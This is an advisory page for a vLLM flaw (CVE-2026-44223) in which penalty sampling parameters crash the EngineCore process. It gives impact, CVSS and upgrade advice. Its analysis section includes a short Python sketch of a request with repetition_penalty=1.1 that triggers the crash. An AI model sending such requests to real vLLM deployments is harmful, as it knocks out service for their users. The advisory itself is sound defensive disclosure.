CVE-2026-44223: CWE-131: Incorrect Calculation of Buffer Size in vllm-project vllm
vLLM versions from 0.18.0 up to but not including 0.20.0 contain a vulnerability in the extract_hidden_states speculative decoding proposer. When a request in a batch uses sampling penalty parameters such as repetition_penalty, frequency_penalty, or presence_penalty, the engine returns a tensor with an incorrect shape after the first decode step. This causes a RuntimeError that crashes the EngineCore process. The issue is resolved in version 0.20.0.
AI Analysis
Technical Summary
The vulnerability (CVE-2026-44223) in vLLM, an inference and serving engine for large language models, arises from an incorrect calculation of buffer size (CWE-131) in the extract_hidden_states speculative decoding proposer. Specifically, when sampling penalty parameters are used in any request within a batch, the engine returns a tensor with an incorrect shape after the first decode step, triggering a RuntimeError that crashes the EngineCore process. This crash can be triggered by a single request with a penalty parameter such as repetition_penalty set to 1.1. The flaw affects versions >= 0.18.0 and < 0.20.0 and is fixed in version 0.20.0.
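As a hedged illustration of the trigger condition described above, the sketch below builds a single completion request with repetition_penalty set to 1.1, the value cited in the advisory. The endpoint path and field names follow vLLM's OpenAI-compatible server conventions and should be verified against the deployed version; the model name and URL are placeholders.

```python
import json

# Hypothetical target: vLLM's OpenAI-compatible server typically listens
# on port 8000 and serves completions at /v1/completions.
VLLM_URL = "http://localhost:8000/v1/completions"

def build_trigger_payload(model: str) -> dict:
    """Build a single completion request exercising the vulnerable path.

    repetition_penalty=1.1 is the trigger value cited in the advisory;
    per the description, other penalty parameters (frequency_penalty,
    presence_penalty) reportedly have the same effect on affected versions.
    """
    return {
        "model": model,
        "prompt": "Hello",
        # More than one decode step is required: the advisory states the
        # shape mismatch occurs after the first decode step.
        "max_tokens": 8,
        "repetition_penalty": 1.1,
    }

payload = build_trigger_payload("my-model")
print(json.dumps(payload))
```

On an affected deployment with the extract_hidden_states speculative decoding proposer enabled, a request like this is reportedly sufficient to crash the EngineCore process, taking down service for all in-flight requests.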
Potential Impact
The vulnerability causes a denial of service by crashing the EngineCore process when processing requests that include sampling penalty parameters. There is no indication of confidentiality or integrity impact. The CVSS v3.1 score is 6.5 (medium severity), reflecting network attack vector, low attack complexity, low privileges required, no user interaction, and impact limited to availability (engine crash). There are no known exploits in the wild.
Mitigation Recommendations
Upgrade to vLLM version 0.20.0 or later, where this vulnerability is fixed. No other official remediation or temporary workaround has been published. Until the upgrade is applied, operators can reduce exposure by restricting untrusted access to the serving endpoint, since a single request carrying a penalty parameter is sufficient to crash the EngineCore process. Verify the upgrade against the vendor's official release notes.
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-05-05T15:42:40.518Z
- CVSS Version: 3.1
- State: PUBLISHED
- Remediation Level: null